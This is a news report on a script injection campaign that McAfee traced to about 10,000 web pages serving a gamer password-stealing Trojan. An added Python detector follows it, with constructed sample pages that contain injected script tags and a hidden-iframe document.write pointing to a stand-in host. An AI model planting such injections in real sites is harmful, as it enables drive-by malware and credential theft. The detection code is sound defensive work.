McAfee has uncovered a script injection attack on some 10,000 Web pages, apparently designed to help attackers steal passwords from online gamers.
"This attack involves injection of script into valid Web page to include a reference to a malicious .JS file (sometimes in the body, other times in the title section)," said McAfee's Avert Labs in a blog. "The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several [existing] vulnerabilities."
"This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another," McAfee said. "At least one of the payload Trojans targets online gamers."
The attack appears to emanate from China, according to McAfee.
The approach is similar to the attack that hit the Miami Dolphins and Dolphins Stadium before the Super Bowl, McAfee says. The Web pages appear to be unaltered, but the attackers inject a small amount of code that redirects the browser to a malicious site.
The site then loads a password-stealing Trojan on the user's machine that can find passwords to popular online games, McAfee says.
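A site owner can check served pages for the pattern McAfee describes: a script reference the site did not put there, in the body or in the title section, pointing at a .JS file that writes an IFRAME. The following is an added example, not code from McAfee or from the original article; the function names, the `.example` hostnames and the sample pages are constructed for illustration, and the regex matching is a heuristic rather than a full HTML parser.

```python
import re
from urllib.parse import urlparse

# <script ... src=...> with quoted or unquoted attribute values
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
TITLE_SPAN = re.compile(r"<title\b[^>]*>(.*?)</title\s*>", re.I | re.S)
# JavaScript that writes an IFRAME into the page (literal form only)
WRITES_IFRAME = re.compile(r"document\.write(?:ln)?\s*\([^)]*<\s*iframe", re.I | re.S)

def audit_page(html, page_host, allowed_hosts=()):
    """Return (reason, src) pairs for script references the site owner
    should review. page_host and allowed_hosts are the hosts the site
    legitimately loads scripts from (an assumption supplied by the caller)."""
    allowed = {page_host.lower(), *(h.lower() for h in allowed_hosts)}
    title_spans = [m.span(1) for m in TITLE_SPAN.finditer(html)]
    findings = []
    for m in SCRIPT_SRC.finditer(html):
        src = m.group(1)
        # Relative URLs have no hostname and resolve to the page's own host.
        host = (urlparse(src).hostname or page_host).lower()
        if any(start <= m.start() < end for start, end in title_spans):
            # A script tag has no legitimate reason to sit inside <title>.
            findings.append(("script-in-title", src))
        elif host not in allowed:
            findings.append(("off-site-script", src))
    return findings

def writes_iframe(js_source):
    """True if a fetched .JS file writes an IFRAME with document.write."""
    return bool(WRITES_IFRAME.search(js_source))

# Constructed sample pages (not taken from the incident).
CLEAN = ('<html><head><title>Team news</title>'
         '<script src="/js/site.js"></script></head><body></body></html>')
TITLE_INJECTED = ('<html><head><title>Team news'
                  '<script src="http://injected.example/1.js"></script>'
                  '</title></head><body></body></html>')
BODY_INJECTED = ('<html><head><title>Scores</title></head><body><p>hi</p>'
                 '<script src=http://injected.example/1.js></script></body></html>')
SAMPLE_JS = ('document.write("<iframe width=0 height=0 '
             'src=http://injected.example/a.htm></iframe>");')

if __name__ == "__main__":
    for name, page in [("clean", CLEAN), ("title", TITLE_INJECTED),
                       ("body", BODY_INJECTED)]:
        print(name, audit_page(page, "www.site.example"))
    print("writes iframe:", writes_iframe(SAMPLE_JS))
```

Running this against each page as served, and comparing the result with the copy in source control, surfaces injected references even though the pages look unaltered in a browser.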